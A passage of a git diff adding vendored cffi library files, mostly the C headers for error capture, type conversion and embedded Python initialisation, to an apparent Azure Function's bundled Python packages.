b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/recompiler.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/setuptools_ext.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/setuptools_ext.cpython-39.pyc new file mode 100644 index 0000000..6d0b07a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/setuptools_ext.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/vengine_cpy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/vengine_cpy.cpython-39.pyc new file mode 100644 index 0000000..102a5a2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/vengine_cpy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/vengine_gen.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/vengine_gen.cpython-39.pyc new file mode 100644 index 0000000..8c95ae4 Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/vengine_gen.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/verifier.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/verifier.cpython-39.pyc new file mode 100644 index 0000000..c96497f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/verifier.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_cffi_errors.h b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_cffi_errors.h new file mode 100644 index 0000000..d9f7ad9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_cffi_errors.h @@ -0,0 +1,149 @@ +#ifndef CFFI_MESSAGEBOX +# ifdef _MSC_VER +# define CFFI_MESSAGEBOX 1 +# else +# define CFFI_MESSAGEBOX 0 +# endif +#endif + + +#if CFFI_MESSAGEBOX +/* Windows only: logic to take the Python-CFFI embedding logic + initialization errors and display them in a background thread + with MessageBox. The idea is that if the whole program closes + as a result of this problem, then likely it is already a console + program and you can read the stderr output in the console too. + If it is not a console program, then it will likely show its own + dialog to complain, or generally not abruptly close, and for this + case the background thread should stay alive. +*/ +static void *volatile _cffi_bootstrap_text; + +static PyObject *_cffi_start_error_capture(void) +{ + PyObject *result = NULL; + PyObject *x, *m, *bi; + + if (InterlockedCompareExchangePointer(&_cffi_bootstrap_text, + (void *)1, NULL) != NULL) + return (PyObject *)1; + + m = PyImport_AddModule("_cffi_error_capture"); + if (m == NULL) + goto error; + + result = PyModule_GetDict(m); + if (result == NULL) + goto error; + +#if PY_MAJOR_VERSION >= 3 + bi = PyImport_ImportModule("builtins"); +#else + bi = PyImport_ImportModule("__builtin__"); +#endif + if (bi == NULL) + goto error; + PyDict_SetItemString(result, "__builtins__", bi); + Py_DECREF(bi); + + x = PyRun_String( + "import sys\n" + "class FileLike:\n" + " def write(self, x):\n" + " try:\n" + " of.write(x)\n" + " except: pass\n" + " self.buf += x\n" + " def flush(self):\n" + " pass\n" + "fl = FileLike()\n" + "fl.buf = ''\n" + "of = sys.stderr\n" + "sys.stderr = fl\n" + "def done():\n" + " sys.stderr = of\n" + " return fl.buf\n", /* make sure the returned value stays alive */ + Py_file_input, + result, result); + Py_XDECREF(x); + + error: + if (PyErr_Occurred()) + { + PyErr_WriteUnraisable(Py_None); + PyErr_Clear(); + } + return result; +} + +#pragma comment(lib, "user32.lib") + +static DWORD WINAPI _cffi_bootstrap_dialog(LPVOID ignored) +{ + Sleep(666); /* may be interrupted if the whole process is closing */ +#if PY_MAJOR_VERSION >= 3 + MessageBoxW(NULL, (wchar_t *)_cffi_bootstrap_text, + L"Python-CFFI error", + MB_OK | MB_ICONERROR); +#else + MessageBoxA(NULL, (char *)_cffi_bootstrap_text, + "Python-CFFI error", + MB_OK | MB_ICONERROR); +#endif + _cffi_bootstrap_text = NULL; + return 0; +} + +static void _cffi_stop_error_capture(PyObject *ecap) +{ + PyObject *s; + void *text; + + if (ecap == (PyObject *)1) + return; + + if (ecap == NULL) + goto error; + + s = PyRun_String("done()", Py_eval_input, ecap, 
ecap);
+ if (s == NULL)
+ goto error;
+
+ /* Show a dialog box, but in a background thread, and
+ never show multiple dialog boxes at once. */
+#if PY_MAJOR_VERSION >= 3
+ text = PyUnicode_AsWideCharString(s, NULL);
+#else
+ text = PyString_AsString(s);
+#endif
+
+ _cffi_bootstrap_text = text;
+
+ if (text != NULL)
+ {
+ HANDLE h;
+ h = CreateThread(NULL, 0, _cffi_bootstrap_dialog,
+ NULL, 0, NULL);
+ if (h != NULL)
+ CloseHandle(h);
+ }
+ /* decref the string, but it should stay alive as 'fl.buf'
+ in the small module above. It will really be freed only if
+ we later get another similar error. So it's a leak of at
+ most one copy of the small module. That's fine for this
+ situation which is usually a "fatal error" anyway. */
+ Py_DECREF(s);
+ PyErr_Clear();
+ return;
+
+ error:
+ _cffi_bootstrap_text = NULL;
+ PyErr_Clear();
+}
+
+#else
+
+static PyObject *_cffi_start_error_capture(void) { return NULL; }
+static void _cffi_stop_error_capture(PyObject *ecap) { }
+
+#endif diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_cffi_include.h b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_cffi_include.h new file mode 100644 index 0000000..e0033e5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_cffi_include.h @@ -0,0 +1,385 @@
+#define _CFFI_
+
+/* We try to define Py_LIMITED_API before including Python.h.
+
+ Mess: we can only define it if Py_DEBUG, Py_TRACE_REFS and
+ Py_REF_DEBUG are not defined. This is a best-effort approximation:
+ we can learn about Py_DEBUG from pyconfig.h, but it is unclear if
+ the same works for the other two macros. Py_DEBUG implies them,
+ but not the other way around.
+
+ The implementation is messy (issue #350): on Windows, with _MSC_VER,
+ we have to define Py_LIMITED_API even before including pyconfig.h.
+ In that case, we guess what pyconfig.h will do to the macros above,
+ and check our guess after the #include.
+
+ Note that on Windows, with CPython 3.x, you need >= 3.5 and virtualenv
+ version >= 16.0.0. With older versions of either, you don't get a
+ copy of PYTHON3.DLL in the virtualenv. We can't check the version of
+ CPython *before* we even include pyconfig.h. ffi.set_source() puts
+ a ``#define _CFFI_NO_LIMITED_API'' at the start of this file if it is
+ running on Windows < 3.5, as an attempt at fixing it, but that's
+ arguably wrong because it may not be the target version of Python.
+ Still better than nothing I guess. As another workaround, you can
+ remove the definition of Py_LIMITED_API here.
+
+ See also 'py_limited_api' in cffi/setuptools_ext.py.
+*/
+#if !defined(_CFFI_USE_EMBEDDING) && !defined(Py_LIMITED_API)
+# ifdef _MSC_VER
+# if !defined(_DEBUG) && !defined(Py_DEBUG) && !defined(Py_TRACE_REFS) && !defined(Py_REF_DEBUG) && !defined(_CFFI_NO_LIMITED_API)
+# define Py_LIMITED_API
+# endif
+# include <pyconfig.h>
+ /* sanity-check: Py_LIMITED_API will cause crashes if any of these
+ are also defined. Normally, the Python file PC/pyconfig.h does not
+ cause any of these to be defined, with the exception that _DEBUG
+ causes Py_DEBUG. Double-check that. 
*/
+# ifdef Py_LIMITED_API
+# if defined(Py_DEBUG)
+# error "pyconfig.h unexpectedly defines Py_DEBUG, but Py_LIMITED_API is set"
+# endif
+# if defined(Py_TRACE_REFS)
+# error "pyconfig.h unexpectedly defines Py_TRACE_REFS, but Py_LIMITED_API is set"
+# endif
+# if defined(Py_REF_DEBUG)
+# error "pyconfig.h unexpectedly defines Py_REF_DEBUG, but Py_LIMITED_API is set"
+# endif
+# endif
+# else
+# include <pyconfig.h>
+# if !defined(Py_DEBUG) && !defined(Py_TRACE_REFS) && !defined(Py_REF_DEBUG) && !defined(_CFFI_NO_LIMITED_API)
+# define Py_LIMITED_API
+# endif
+# endif
+#endif
+
+#include <Python.h>
+#ifdef __cplusplus
+extern "C" {
+#endif
+#include <stddef.h>
+#include "parse_c_type.h"
+
+/* this block of #ifs should be kept exactly identical between
+ c/_cffi_backend.c, cffi/vengine_cpy.py, cffi/vengine_gen.py
+ and cffi/_cffi_include.h */
+#if defined(_MSC_VER)
+# include <malloc.h> /* for alloca() */
+# if _MSC_VER < 1600 /* MSVC < 2010 */
+ typedef __int8 int8_t;
+ typedef __int16 int16_t;
+ typedef __int32 int32_t;
+ typedef __int64 int64_t;
+ typedef unsigned __int8 uint8_t;
+ typedef unsigned __int16 uint16_t;
+ typedef unsigned __int32 uint32_t;
+ typedef unsigned __int64 uint64_t;
+ typedef __int8 int_least8_t;
+ typedef __int16 int_least16_t;
+ typedef __int32 int_least32_t;
+ typedef __int64 int_least64_t;
+ typedef unsigned __int8 uint_least8_t;
+ typedef unsigned __int16 uint_least16_t;
+ typedef unsigned __int32 uint_least32_t;
+ typedef unsigned __int64 uint_least64_t;
+ typedef __int8 int_fast8_t;
+ typedef __int16 int_fast16_t;
+ typedef __int32 int_fast32_t;
+ typedef __int64 int_fast64_t;
+ typedef unsigned __int8 uint_fast8_t;
+ typedef unsigned __int16 uint_fast16_t;
+ typedef unsigned __int32 uint_fast32_t;
+ typedef unsigned __int64 uint_fast64_t;
+ typedef __int64 intmax_t;
+ typedef unsigned __int64 uintmax_t;
+# else
+# include <stdint.h>
+# endif
+# if _MSC_VER < 1800 /* MSVC < 2013 */
+# ifndef __cplusplus
+ typedef unsigned char _Bool;
+# endif
+# endif
+#else
+# include <stdint.h>
+# if (defined (__SVR4) && defined (__sun)) || defined(_AIX) || defined(__hpux)
+# include <alloca.h>
+# endif
+#endif
+
+#ifdef __GNUC__
+# define _CFFI_UNUSED_FN __attribute__((unused))
+#else
+# define _CFFI_UNUSED_FN /* nothing */
+#endif
+
+#ifdef __cplusplus
+# ifndef _Bool
+ typedef bool _Bool; /* semi-hackish: C++ has no _Bool; bool is builtin */
+# endif
+#endif
+
+/********** CPython-specific section **********/
+#ifndef PYPY_VERSION
+
+
+#if PY_MAJOR_VERSION >= 3
+# define PyInt_FromLong PyLong_FromLong
+#endif
+
+#define _cffi_from_c_double PyFloat_FromDouble
+#define _cffi_from_c_float PyFloat_FromDouble
+#define _cffi_from_c_long PyInt_FromLong
+#define _cffi_from_c_ulong PyLong_FromUnsignedLong
+#define _cffi_from_c_longlong PyLong_FromLongLong
+#define _cffi_from_c_ulonglong PyLong_FromUnsignedLongLong
+#define _cffi_from_c__Bool PyBool_FromLong
+
+#define _cffi_to_c_double PyFloat_AsDouble
+#define _cffi_to_c_float PyFloat_AsDouble
+
+#define _cffi_from_c_int(x, type) \
+ (((type)-1) > 0 ? /* unsigned */ \
+ (sizeof(type) < sizeof(long) ? \
+ PyInt_FromLong((long)x) : \
+ sizeof(type) == sizeof(long) ? \
+ PyLong_FromUnsignedLong((unsigned long)x) : \
+ PyLong_FromUnsignedLongLong((unsigned long long)x)) : \
+ (sizeof(type) <= sizeof(long) ? \
+ PyInt_FromLong((long)x) : \
+ PyLong_FromLongLong((long long)x)))
+
+#define _cffi_to_c_int(o, type) \
+ ((type)( \
+ sizeof(type) == 1 ? (((type)-1) > 0 ? (type)_cffi_to_c_u8(o) \
+ : (type)_cffi_to_c_i8(o)) : \
+ sizeof(type) == 2 ? (((type)-1) > 0 ? 
(type)_cffi_to_c_u16(o) \ + : (type)_cffi_to_c_i16(o)) : \ + sizeof(type) == 4 ? (((type)-1) > 0 ? (type)_cffi_to_c_u32(o) \ + : (type)_cffi_to_c_i32(o)) : \ + sizeof(type) == 8 ? (((type)-1) > 0 ? (type)_cffi_to_c_u64(o) \ + : (type)_cffi_to_c_i64(o)) : \ + (Py_FatalError("unsupported size for type " #type), (type)0))) + +#define _cffi_to_c_i8 \ + ((int(*)(PyObject *))_cffi_exports[1]) +#define _cffi_to_c_u8 \ + ((int(*)(PyObject *))_cffi_exports[2]) +#define _cffi_to_c_i16 \ + ((int(*)(PyObject *))_cffi_exports[3]) +#define _cffi_to_c_u16 \ + ((int(*)(PyObject *))_cffi_exports[4]) +#define _cffi_to_c_i32 \ + ((int(*)(PyObject *))_cffi_exports[5]) +#define _cffi_to_c_u32 \ + ((unsigned int(*)(PyObject *))_cffi_exports[6]) +#define _cffi_to_c_i64 \ + ((long long(*)(PyObject *))_cffi_exports[7]) +#define _cffi_to_c_u64 \ + ((unsigned long long(*)(PyObject *))_cffi_exports[8]) +#define _cffi_to_c_char \ + ((int(*)(PyObject *))_cffi_exports[9]) +#define _cffi_from_c_pointer \ + ((PyObject *(*)(char *, struct _cffi_ctypedescr *))_cffi_exports[10]) +#define _cffi_to_c_pointer \ + ((char *(*)(PyObject *, struct _cffi_ctypedescr *))_cffi_exports[11]) +#define _cffi_get_struct_layout \ + not used any more +#define _cffi_restore_errno \ + ((void(*)(void))_cffi_exports[13]) +#define _cffi_save_errno \ + ((void(*)(void))_cffi_exports[14]) +#define _cffi_from_c_char \ + ((PyObject *(*)(char))_cffi_exports[15]) +#define _cffi_from_c_deref \ + ((PyObject *(*)(char *, struct _cffi_ctypedescr *))_cffi_exports[16]) +#define _cffi_to_c \ + ((int(*)(char *, struct _cffi_ctypedescr *, PyObject *))_cffi_exports[17]) +#define _cffi_from_c_struct \ + ((PyObject *(*)(char *, struct _cffi_ctypedescr *))_cffi_exports[18]) +#define _cffi_to_c_wchar_t \ + ((_cffi_wchar_t(*)(PyObject *))_cffi_exports[19]) +#define _cffi_from_c_wchar_t \ + ((PyObject *(*)(_cffi_wchar_t))_cffi_exports[20]) +#define _cffi_to_c_long_double \ + ((long double(*)(PyObject *))_cffi_exports[21]) +#define _cffi_to_c__Bool \ + ((_Bool(*)(PyObject *))_cffi_exports[22]) +#define _cffi_prepare_pointer_call_argument \ + ((Py_ssize_t(*)(struct _cffi_ctypedescr *, \ + PyObject *, char **))_cffi_exports[23]) +#define _cffi_convert_array_from_object \ + ((int(*)(char *, struct _cffi_ctypedescr *, PyObject *))_cffi_exports[24]) +#define _CFFI_CPIDX 25 +#define _cffi_call_python \ + ((void(*)(struct _cffi_externpy_s *, char *))_cffi_exports[_CFFI_CPIDX]) +#define _cffi_to_c_wchar3216_t \ + ((int(*)(PyObject *))_cffi_exports[26]) +#define _cffi_from_c_wchar3216_t \ + ((PyObject *(*)(int))_cffi_exports[27]) +#define _CFFI_NUM_EXPORTS 28 + +struct _cffi_ctypedescr; + +static void *_cffi_exports[_CFFI_NUM_EXPORTS]; + +#define _cffi_type(index) ( \ + assert((((uintptr_t)_cffi_types[index]) & 1) == 0), \ + (struct _cffi_ctypedescr *)_cffi_types[index]) + +static PyObject *_cffi_init(const char *module_name, Py_ssize_t version, + const struct _cffi_type_context_s *ctx) +{ + PyObject *module, *o_arg, *new_module; + void *raw[] = { + (void *)module_name, + (void *)version, + (void *)_cffi_exports, + (void *)ctx, + }; + + module = PyImport_ImportModule("_cffi_backend"); + if (module == NULL) + goto failure; + + o_arg = PyLong_FromVoidPtr((void *)raw); + if (o_arg == NULL) + goto failure; + + new_module = PyObject_CallMethod( + module, (char *)"_init_cffi_1_0_external_module", (char *)"O", o_arg); + + Py_DECREF(o_arg); + Py_DECREF(module); + return new_module; + + failure: + Py_XDECREF(module); + return NULL; +} + + +#ifdef HAVE_WCHAR_H +typedef wchar_t 
_cffi_wchar_t; +#else +typedef uint16_t _cffi_wchar_t; /* same random pick as _cffi_backend.c */ +#endif + +_CFFI_UNUSED_FN static uint16_t _cffi_to_c_char16_t(PyObject *o) +{ + if (sizeof(_cffi_wchar_t) == 2) + return (uint16_t)_cffi_to_c_wchar_t(o); + else + return (uint16_t)_cffi_to_c_wchar3216_t(o); +} + +_CFFI_UNUSED_FN static PyObject *_cffi_from_c_char16_t(uint16_t x) +{ + if (sizeof(_cffi_wchar_t) == 2) + return _cffi_from_c_wchar_t((_cffi_wchar_t)x); + else + return _cffi_from_c_wchar3216_t((int)x); +} + +_CFFI_UNUSED_FN static int _cffi_to_c_char32_t(PyObject *o) +{ + if (sizeof(_cffi_wchar_t) == 4) + return (int)_cffi_to_c_wchar_t(o); + else + return (int)_cffi_to_c_wchar3216_t(o); +} + +_CFFI_UNUSED_FN static PyObject *_cffi_from_c_char32_t(unsigned int x) +{ + if (sizeof(_cffi_wchar_t) == 4) + return _cffi_from_c_wchar_t((_cffi_wchar_t)x); + else + return _cffi_from_c_wchar3216_t((int)x); +} + +union _cffi_union_alignment_u { + unsigned char m_char; + unsigned short m_short; + unsigned int m_int; + unsigned long m_long; + unsigned long long m_longlong; + float m_float; + double m_double; + long double m_longdouble; +}; + +struct _cffi_freeme_s { + struct _cffi_freeme_s *next; + union _cffi_union_alignment_u alignment; +}; + +_CFFI_UNUSED_FN static int +_cffi_convert_array_argument(struct _cffi_ctypedescr *ctptr, PyObject *arg, + char **output_data, Py_ssize_t datasize, + struct _cffi_freeme_s **freeme) +{ + char *p; + if (datasize < 0) + return -1; + + p = *output_data; + if (p == NULL) { + struct _cffi_freeme_s *fp = (struct _cffi_freeme_s *)PyObject_Malloc( + offsetof(struct _cffi_freeme_s, alignment) + (size_t)datasize); + if (fp == NULL) + return -1; + fp->next = *freeme; + *freeme = fp; + p = *output_data = (char *)&fp->alignment; + } + memset((void *)p, 0, (size_t)datasize); + return _cffi_convert_array_from_object(p, ctptr, arg); +} + +_CFFI_UNUSED_FN static void +_cffi_free_array_arguments(struct _cffi_freeme_s *freeme) +{ + do { + void *p = (void *)freeme; + freeme = freeme->next; + PyObject_Free(p); + } while (freeme != NULL); +} + +/********** end CPython-specific section **********/ +#else +_CFFI_UNUSED_FN +static void (*_cffi_call_python_org)(struct _cffi_externpy_s *, char *); +# define _cffi_call_python _cffi_call_python_org +#endif + + +#define _cffi_array_len(array) (sizeof(array) / sizeof((array)[0])) + +#define _cffi_prim_int(size, sign) \ + ((size) == 1 ? ((sign) ? _CFFI_PRIM_INT8 : _CFFI_PRIM_UINT8) : \ + (size) == 2 ? ((sign) ? _CFFI_PRIM_INT16 : _CFFI_PRIM_UINT16) : \ + (size) == 4 ? ((sign) ? _CFFI_PRIM_INT32 : _CFFI_PRIM_UINT32) : \ + (size) == 8 ? ((sign) ? _CFFI_PRIM_INT64 : _CFFI_PRIM_UINT64) : \ + _CFFI__UNKNOWN_PRIM) + +#define _cffi_prim_float(size) \ + ((size) == sizeof(float) ? _CFFI_PRIM_FLOAT : \ + (size) == sizeof(double) ? _CFFI_PRIM_DOUBLE : \ + (size) == sizeof(long double) ? 
_CFFI__UNKNOWN_LONG_DOUBLE : \
+ _CFFI__UNKNOWN_FLOAT_PRIM)
+
+#define _cffi_check_int(got, got_nonpos, expected) \
+ ((got_nonpos) == (expected <= 0) && \
+ (got) == (unsigned long long)expected)
+
+#ifdef MS_WIN32
+# define _cffi_stdcall __stdcall
+#else
+# define _cffi_stdcall /* nothing */
+#endif
+
+#ifdef __cplusplus
+}
+#endif
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_embedding.h b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_embedding.h
new file mode 100644
index 0000000..6238f72
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_embedding.h
@@ -0,0 +1,528 @@
+
+/***** Support code for embedding *****/
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+
+#if defined(_WIN32)
+# define CFFI_DLLEXPORT __declspec(dllexport)
+#elif defined(__GNUC__)
+# define CFFI_DLLEXPORT __attribute__((visibility("default")))
+#else
+# define CFFI_DLLEXPORT /* nothing */
+#endif
+
+
+/* There are two global variables of type _cffi_call_python_fnptr:
+
+ * _cffi_call_python, which we declare just below, is the one called
+ by ``extern "Python"`` implementations.
+
+ * _cffi_call_python_org, which on CPython is actually part of the
+ _cffi_exports[] array, is the function pointer copied from
+ _cffi_backend. If _cffi_start_python() fails, then this is set
+ to NULL; otherwise, it should never be NULL.
+
+ After initialization is complete, both are equal. However, the
+ first one remains equal to &_cffi_start_and_call_python until the
+ very end of initialization, when we are (or should be) sure that
+ concurrent threads also see a completely initialized world, and
+ only then is it changed.
+*/
+#undef _cffi_call_python
+typedef void (*_cffi_call_python_fnptr)(struct _cffi_externpy_s *, char *);
+static void _cffi_start_and_call_python(struct _cffi_externpy_s *, char *);
+static _cffi_call_python_fnptr _cffi_call_python = &_cffi_start_and_call_python;
+
+
+#ifndef _MSC_VER
+ /* --- Assuming a GCC not infinitely old --- */
+# define cffi_compare_and_swap(l,o,n) __sync_bool_compare_and_swap(l,o,n)
+# define cffi_write_barrier() __sync_synchronize()
+# if !defined(__amd64__) && !defined(__x86_64__) && \
+ !defined(__i386__) && !defined(__i386)
+# define cffi_read_barrier() __sync_synchronize()
+# else
+# define cffi_read_barrier() (void)0
+# endif
+#else
+ /* --- Windows threads version --- */
+# include <windows.h>
+# define cffi_compare_and_swap(l,o,n) \
+ (InterlockedCompareExchangePointer(l,n,o) == (o))
+# define cffi_write_barrier() InterlockedCompareExchange(&_cffi_dummy,0,0)
+# define cffi_read_barrier() (void)0
+static volatile LONG _cffi_dummy;
+#endif
+
+#ifdef WITH_THREAD
+# ifndef _MSC_VER
+# include <pthread.h>
+ static pthread_mutex_t _cffi_embed_startup_lock;
+# else
+ static CRITICAL_SECTION _cffi_embed_startup_lock;
+# endif
+ static char _cffi_embed_startup_lock_ready = 0;
+#endif
+
+static void _cffi_acquire_reentrant_mutex(void)
+{
+ static void *volatile lock = NULL;
+
+ while (!cffi_compare_and_swap(&lock, NULL, (void *)1)) {
+ /* should ideally do a spin loop instruction here, but
+ hard to do it portably and doesn't really matter I
+ think: pthread_mutex_init() should be very fast, and
+ this is only run at start-up anyway.
*/
+ }
+
+#ifdef WITH_THREAD
+ if (!_cffi_embed_startup_lock_ready) {
+# ifndef _MSC_VER
+ pthread_mutexattr_t attr;
+ pthread_mutexattr_init(&attr);
+ pthread_mutexattr_settype(&attr, PTHREAD_MUTEX_RECURSIVE);
+ pthread_mutex_init(&_cffi_embed_startup_lock, &attr);
+# else
+ InitializeCriticalSection(&_cffi_embed_startup_lock);
+# endif
+ _cffi_embed_startup_lock_ready = 1;
+ }
+#endif
+
+ while (!cffi_compare_and_swap(&lock, (void *)1, NULL))
+ ;
+
+#ifndef _MSC_VER
+ pthread_mutex_lock(&_cffi_embed_startup_lock);
+#else
+ EnterCriticalSection(&_cffi_embed_startup_lock);
+#endif
+}
+
+static void _cffi_release_reentrant_mutex(void)
+{
+#ifndef _MSC_VER
+ pthread_mutex_unlock(&_cffi_embed_startup_lock);
+#else
+ LeaveCriticalSection(&_cffi_embed_startup_lock);
+#endif
+}
+
+
+/********** CPython-specific section **********/
+#ifndef PYPY_VERSION
+
+#include "_cffi_errors.h"
+
+
+#define _cffi_call_python_org _cffi_exports[_CFFI_CPIDX]
+
+PyMODINIT_FUNC _CFFI_PYTHON_STARTUP_FUNC(void); /* forward */
+
+static void _cffi_py_initialize(void)
+{
+ /* XXX use initsigs=0, which "skips initialization registration of
+ signal handlers, which might be useful when Python is
+ embedded" according to the Python docs. But review and think
+ if it should be a user-controllable setting.
+
+ XXX we should also give a way to write errors to a buffer
+ instead of to stderr.
+
+ XXX if importing 'site' fails, CPython (any version) calls
+ exit(). Should we try to work around this behavior here?
+ */
+ Py_InitializeEx(0);
+}
+
+static int _cffi_initialize_python(void)
+{
+ /* This initializes Python, imports _cffi_backend, and then the
+ present .dll/.so is set up as a CPython C extension module.
+ */
+ int result;
+ PyGILState_STATE state;
+ PyObject *pycode=NULL, *global_dict=NULL, *x;
+ PyObject *builtins;
+
+ state = PyGILState_Ensure();
+
+ /* Call the initxxx() function from the present module. It will
+ create and initialize us as a CPython extension module, instead
+ of letting the startup Python code do it---it might reimport
+ the same .dll/.so and get maybe confused on some platforms.
+ It might also have troubles locating the .dll/.so again for all
+ I know.
+ */
+ (void)_CFFI_PYTHON_STARTUP_FUNC();
+ if (PyErr_Occurred())
+ goto error;
+
+ /* Now run the Python code provided to ffi.embedding_init_code().
+ */
+ pycode = Py_CompileString(_CFFI_PYTHON_STARTUP_CODE,
+ "<init code for '" _CFFI_MODULE_NAME "'>",
+ Py_file_input);
+ if (pycode == NULL)
+ goto error;
+ global_dict = PyDict_New();
+ if (global_dict == NULL)
+ goto error;
+ builtins = PyEval_GetBuiltins();
+ if (builtins == NULL)
+ goto error;
+ if (PyDict_SetItemString(global_dict, "__builtins__", builtins) < 0)
+ goto error;
+ x = PyEval_EvalCode(
+#if PY_MAJOR_VERSION < 3
+ (PyCodeObject *)
+#endif
+ pycode, global_dict, global_dict);
+ if (x == NULL)
+ goto error;
+ Py_DECREF(x);
+
+ /* Done! Now if we've been called from
+ _cffi_start_and_call_python() in an ``extern "Python"``, we can
+ only hope that the Python code did correctly set up the
+ corresponding @ffi.def_extern() function. Otherwise, the
+ general logic of ``extern "Python"`` functions (inside the
+ _cffi_backend module) will find that the reference is still
+ missing and print an error.
+ */
+ result = 0;
+ done:
+ Py_XDECREF(pycode);
+ Py_XDECREF(global_dict);
+ PyGILState_Release(state);
+ return result;
+
+ error:;
+ {
+ /* Print as much information as potentially useful.
+ Debugging load-time failures with embedding is not fun + */ + PyObject *ecap; + PyObject *exception, *v, *tb, *f, *modules, *mod; + PyErr_Fetch(&exception, &v, &tb); + ecap = _cffi_start_error_capture(); + f = PySys_GetObject((char *)"stderr"); + if (f != NULL && f != Py_None) { + PyFile_WriteString( + "Failed to initialize the Python-CFFI embedding logic:\n\n", f); + } + + if (exception != NULL) { + PyErr_NormalizeException(&exception, &v, &tb); + PyErr_Display(exception, v, tb); + } + Py_XDECREF(exception); + Py_XDECREF(v); + Py_XDECREF(tb); + + if (f != NULL && f != Py_None) { + PyFile_WriteString("\nFrom: " _CFFI_MODULE_NAME + "\ncompiled with cffi version: 1.15.1" + "\n_cffi_backend module: ", f); + modules = PyImport_GetModuleDict(); + mod = PyDict_GetItemString(modules, "_cffi_backend"); + if (mod == NULL) { + PyFile_WriteString("not loaded", f); + } + else { + v = PyObject_GetAttrString(mod, "__file__"); + PyFile_WriteObject(v, f, 0); + Py_XDECREF(v); + } + PyFile_WriteString("\nsys.path: ", f); + PyFile_WriteObject(PySys_GetObject((char *)"path"), f, 0); + PyFile_WriteString("\n\n", f); + } + _cffi_stop_error_capture(ecap); + } + result = -1; + goto done; +} + +#if PY_VERSION_HEX < 0x03080000 +PyAPI_DATA(char *) _PyParser_TokenNames[]; /* from CPython */ +#endif + +static int _cffi_carefully_make_gil(void) +{ + /* This does the basic initialization of Python. It can be called + completely concurrently from unrelated threads. It assumes + that we don't hold the GIL before (if it exists), and we don't + hold it afterwards. + + (What it really does used to be completely different in Python 2 + and Python 3, with the Python 2 solution avoiding the spin-lock + around the Py_InitializeEx() call. However, after recent changes + to CPython 2.7 (issue #358) it no longer works. So we use the + Python 3 solution everywhere.) + + This initializes Python by calling Py_InitializeEx(). + Important: this must not be called concurrently at all. + So we use a global variable as a simple spin lock. This global + variable must be from 'libpythonX.Y.so', not from this + cffi-based extension module, because it must be shared from + different cffi-based extension modules. + + In Python < 3.8, we choose + _PyParser_TokenNames[0] as a completely arbitrary pointer value + that is never written to. The default is to point to the + string "ENDMARKER". We change it temporarily to point to the + next character in that string. (Yes, I know it's REALLY + obscure.) + + In Python >= 3.8, this string array is no longer writable, so + instead we pick PyCapsuleType.tp_version_tag. We can't change + Python < 3.8 because someone might use a mixture of cffi + embedded modules, some of which were compiled before this file + changed. + */ + +#ifdef WITH_THREAD +# if PY_VERSION_HEX < 0x03080000 + char *volatile *lock = (char *volatile *)_PyParser_TokenNames; + char *old_value, *locked_value; + + while (1) { /* spin loop */ + old_value = *lock; + locked_value = old_value + 1; + if (old_value[0] == 'E') { + assert(old_value[1] == 'N'); + if (cffi_compare_and_swap(lock, old_value, locked_value)) + break; + } + else { + assert(old_value[0] == 'N'); + /* should ideally do a spin loop instruction here, but + hard to do it portably and doesn't really matter I + think: PyEval_InitThreads() should be very fast, and + this is only run at start-up anyway. 
*/ + } + } +# else + int volatile *lock = (int volatile *)&PyCapsule_Type.tp_version_tag; + int old_value, locked_value; + assert(!(PyCapsule_Type.tp_flags & Py_TPFLAGS_HAVE_VERSION_TAG)); + + while (1) { /* spin loop */ + old_value = *lock; + locked_value = -42; + if (old_value == 0) { + if (cffi_compare_and_swap(lock, old_value, locked_value)) + break; + } + else { + assert(old_value == locked_value); + /* should ideally do a spin loop instruction here, but + hard to do it portably and doesn't really matter I + think: PyEval_InitThreads() should be very fast, and + this is only run at start-up anyway. */ + } + } +# endif +#endif + + /* call Py_InitializeEx() */ + if (!Py_IsInitialized()) { + _cffi_py_initialize(); +#if PY_VERSION_HEX < 0x03070000 + PyEval_InitThreads(); +#endif + PyEval_SaveThread(); /* release the GIL */ + /* the returned tstate must be the one that has been stored into the + autoTLSkey by _PyGILState_Init() called from Py_Initialize(). */ + } + else { +#if PY_VERSION_HEX < 0x03070000 + /* PyEval_InitThreads() is always a no-op from CPython 3.7 */ + PyGILState_STATE state = PyGILState_Ensure(); + PyEval_InitThreads(); + PyGILState_Release(state); +#endif + } + +#ifdef WITH_THREAD + /* release the lock */ + while (!cffi_compare_and_swap(lock, locked_value, old_value)) + ; +#endif + + return 0; +} + +/********** end CPython-specific section **********/ + + +#else + + +/********** PyPy-specific section **********/ + +PyMODINIT_FUNC _CFFI_PYTHON_STARTUP_FUNC(const void 